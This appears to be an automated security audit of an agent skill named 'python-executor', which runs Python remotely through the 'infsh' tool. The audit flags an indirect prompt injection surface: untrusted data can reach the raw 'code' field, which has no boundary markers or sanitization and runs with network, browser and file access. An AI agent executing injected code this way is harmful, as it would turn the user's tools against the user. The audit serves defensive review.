python-executor
Pass
Audited by Gen Agent Trust Hub on Mar 12, 2026
Risk Level: SAFECOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill uses the 'infsh' command-line interface to execute Python scripts on the inference.sh remote infrastructure. This functionality is the primary intended purpose of the skill.
- [PROMPT_INJECTION]: The skill presents a surface for indirect prompt injection because it accepts a raw 'code' string for execution. An attacker could potentially inject malicious logic if the agent incorporates untrusted external data into this code block without proper sanitization. * Ingestion points: The 'code' field in the input schema defined in 'SKILL.md'. * Boundary markers: There are no explicit boundary markers or 'ignore' instructions to separate data from code logic. * Capability inventory: The execution environment includes full Python capabilities including network access via 'requests' and 'httpx', browser automation via 'playwright' and 'selenium', and file system access within the 'outputs/' directory. * Sanitization: The skill definition does not implement any sanitization or validation of the input code string.
Audit Metadata